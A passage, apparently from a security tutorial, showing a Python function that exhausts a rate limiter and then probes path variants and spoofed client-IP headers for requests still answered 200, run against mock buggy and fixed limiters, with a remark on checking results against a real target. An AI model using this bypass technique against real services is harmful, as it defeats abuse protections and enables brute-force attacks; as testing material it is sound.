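def find_bypass(limiter, path, ips=("127.0.0.1",)):
    """Exhaust the limit on the plain route, then list every variant still answered 200."""
    while limiter.request(path)[0] != 429:
        pass
    found = []
    for p in path_variants(path)[1:]:
        if limiter.request(p)[0] == 200:
            found.append(("path", p))
    for hdrs, label in header_spoof_variants(list(ips)):
        if limiter.request(path, hdrs)[0] == 200:
            found.append(("header", label))
    return found


if __name__ == "__main__":
    print("buggy limiter:", find_bypass(MockLimiter(), "/api/myprofile"))
    print("fixed limiter:", find_bypass(FixedLimiter(), "/api/myprofile"))
```

On a real target, `rate_limit_state` on each response shows whether a variant merely got a 200 or actually reset the remaining-count, which is the difference between a new bucket and a limiter that only throttles some status codes.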
-- Pending